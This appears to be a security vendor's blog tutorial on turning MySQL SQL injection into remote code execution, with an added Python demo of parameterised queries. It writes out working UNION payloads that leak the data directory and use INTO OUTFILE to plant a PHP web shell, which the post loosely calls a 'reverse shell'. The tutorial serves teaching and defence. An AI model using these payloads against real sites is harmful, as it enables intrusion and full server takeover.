How to perform SQLi to RCE?
One of the most interesting and important parts of any site is its database. So it is important to protect it from attackers, and in particular from the most common attack against databases: SQL injection.
Why?
The reason this attack is so common is that in most cases a programmer sends a query to the database to get a particular answer, and part of that query is built from user input. (Here comes the part about protection and input validation, but we will save it for another time …)
Finding SQLi while investigating a site is cool. But you will agree with me that finding RCE is cooler.
And this is where a methodology that not many try to use comes into play: SQLi to RCE. (Yes, it is possible.)
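The root cause described above, shown as an added example that is not part of the original post: the same lookup written once with string concatenation and once with a bound parameter, run against a constructed in-memory SQLite table (the table, rows and function names are assumptions for the demo, not anything from the post). The payload keeps the four-column UNION shape the post uses, with a harmless string literal in the reflected column.

```python
import sqlite3


def make_db():
    """Constructed sample catalogue standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER, name TEXT, price REAL, stock INTEGER)"
    )
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?, ?)",
        [(1, "widget", 9.99, 10), (2, "gadget", 19.99, 3)],
    )
    return conn


def lookup_vulnerable(conn, name):
    """The SQL text is assembled by string concatenation, so whatever the
    user types becomes part of the statement itself (the pattern the post
    names as the reason SQL injection is so common)."""
    sql = f"SELECT id, name, price, stock FROM products WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Same query, but the value travels as a bound parameter: the SQL text
    is fixed and the input can only ever be compared as data, never parsed."""
    sql = "SELECT id, name, price, stock FROM products WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Same four-column UNION shape as the post's payload; the reflected (second)
# column carries a plain marker string instead of a server variable.
PAYLOAD = "' union select 1,'injected',3,4 --"


def demo():
    """Runs both lookups with the payload and one normal lookup, returning
    the rows each one produced so the difference can be checked."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "safe": lookup_safe(conn, PAYLOAD),
        "normal": lookup_safe(conn, "widget"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:10s} -> {rows}")
```

The concatenated version returns a row the attacker wrote (the UNION ran), while the parameterised version returns nothing for the payload and still returns the normal row for a real product name: the closing quote and the UNION are only ever compared against the name column as a literal value.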
How?
One of the features of the SQL language is writing to a file, which sounds naive at first, almost like in any programming language. But then comes the interesting part: what if we write a shell file to the system ourselves and use it from the outside? Sounds fun: a full reverse shell on the system (depending on permissions, of course; in MySQL, INTO OUTFILE needs the FILE privilege on the injected account and is blocked when the server's secure_file_priv setting is NULL or limited to a directory outside the web root, which is the main server-side control against this technique).
Now, let's drill down.
The first thing we do is check where the database stores its files on the server. This is done by injecting the MySQL system variable @@datadir into the SQL query to get the full path of its location on the server.
Example:
Assuming we found a reflection in the second column, we enter the following payload:
'union select 1,@@datadir,3,4 --
And the output will look like this:
C:\xampp\mysql\data\
From the path we can infer that the server uses XAMPP, and if we want to create a file and reach it through the web server we will need to create it in the web root, C:\xampp\htdocs
With this information it is already possible to build the payload for the shell:
'union select 1,<php_payload>,3,4 into outfile <path> --
'union select 1,'<?php system($_GET["cmd"]); ?>',3,4 into outfile 'C:\\xampp\\htdocs\\rce.php' --
And that's it, we created a reverse shell within the system. All that is left is to access it from outside (over the web), via the following link:
<host>/rce.php?cmd=<command>
In my case the server is local, so:
127.0.0.1/rce.php?cmd=time
With the following output (the 1, 3 and 4 around the command output are the other three columns of the UNION row, which INTO OUTFILE wrote into the file alongside the PHP):
1 The current time is: 16:22:25.20 Enter the new time: 3 4
And now you know how to perform SQLi to RCE!
Want to check if your website is vulnerable to an "SQLi to RCE" attack?
Let Kayran do that for you!